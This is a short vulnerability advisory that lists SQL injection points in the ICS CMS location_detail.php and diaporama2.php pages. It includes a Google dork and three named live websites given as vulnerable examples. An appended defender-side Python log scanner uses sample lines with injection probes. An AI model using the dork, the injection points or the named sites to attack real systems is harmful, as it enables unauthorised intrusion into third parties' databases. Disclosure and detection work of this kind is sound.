ICS CMS <= Multiple SQL Injection Vulnerabilities

2014-05-02 15:29:05
Posted by: Daisuke Dan

#####################################################
#ICS CMS <= Multiple SQL Injection Vulnerabilities #
#####################################################

# Exploit Title: ICS CMS <= Multiple SQL Injection Vulnerabilities
# Google Dork: intext:"powered by ICS" warning mysql inurl:"id="
# Date: 15-12-2013
# Exploit Author: Daisuke
# Vendor Homepage: http://www.ics.fr/accueil/accueil.php
# Software Link: http://www.ics.fr/produits/produits.php
# Version: Not Found
# Tested on: Windows Seven

=First SQL Injection Vulnerability=

http://localhost/location_detail.php?id=1000060&table=appartement&pagephoto=[Injection]

=Second SQL Injection Vulnerability=

http://localhost/location_detail.php?id=[Injection]

=Third SQL Injection Vulnerability=

http://localhost/include/php/diaporama2.php

=Examples=

http://www.orimnice.fr/location_detail.php?id=1000060&table=appartement&pagephoto=0

http://www.agence-baumann.com/location_detail.php?id=0000243&table=appartement&pagephoto=0

http://www.immo-zimmermann.com/location_detail.php?id=0000144&table=appartement&pagephoto=-10
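
A defender-side check for the first two findings, added here as an example and not part of the original advisory: it scans web-server access log lines for requests to location_detail.php whose id, table or pagephoto value departs from the shapes seen in the URLs above. The expected patterns, the combined log format and the sample lines are constructed assumptions; diaporama2.php is not covered because the advisory names no parameter for it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Expected value shapes, inferred from the URLs listed in the advisory (assumption).
EXPECTED = {
    "id": re.compile(r"\d{1,10}"),
    "table": re.compile(r"[a-z_]{1,32}"),
    "pagephoto": re.compile(r"-?\d{1,6}"),
}
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return the sorted names of location_detail.php parameters whose decoded
    value does not fit its expected shape; [] for clean or unrelated lines."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/location_detail.php"):
        return []
    # parse_qs percent-decodes values and keeps repeated parameters as a list.
    params = parse_qs(url.query, keep_blank_values=True)
    bad = set()
    for name, pattern in EXPECTED.items():
        for value in params.get(name, []):
            if not pattern.fullmatch(value):
                bad.add(name)
    return sorted(bad)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/May/2014:15:29:05 +0000] "GET /location_detail.php?id=1000060&table=appartement&pagephoto=0 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/May/2014:15:30:11 +0000] "GET /location_detail.php?id=0000144&table=appartement&pagephoto=-10 HTTP/1.1" 200 4980',
    '198.51.100.7 - - [02/May/2014:15:31:40 +0000] "GET /location_detail.php?id=1000060&table=appartement&pagephoto=0%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [02/May/2014:15:31:44 +0000] "GET /location_detail.php?id=1%20OR%201%3D1 HTTP/1.1" 200 298',
    '203.0.113.5 - - [02/May/2014:15:32:02 +0000] "GET /index.php?id=abc HTTP/1.1" 200 1024',
]

def scan(lines):
    """Return (line_number, flagged_parameters) for every line that trips a check."""
    return [(n, bad) for n, line in enumerate(lines, 1) if (bad := suspicious_params(line))]

if __name__ == "__main__":
    for n, bad in scan(SAMPLE_LOG):
        print(f"line {n}: unexpected value in {', '.join(bad)}")
```

A flagged line only means the value is malformed for that parameter; the same shape checks belong in the application's input handling, since logs show requests after the fact.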

Fixes

No fixes
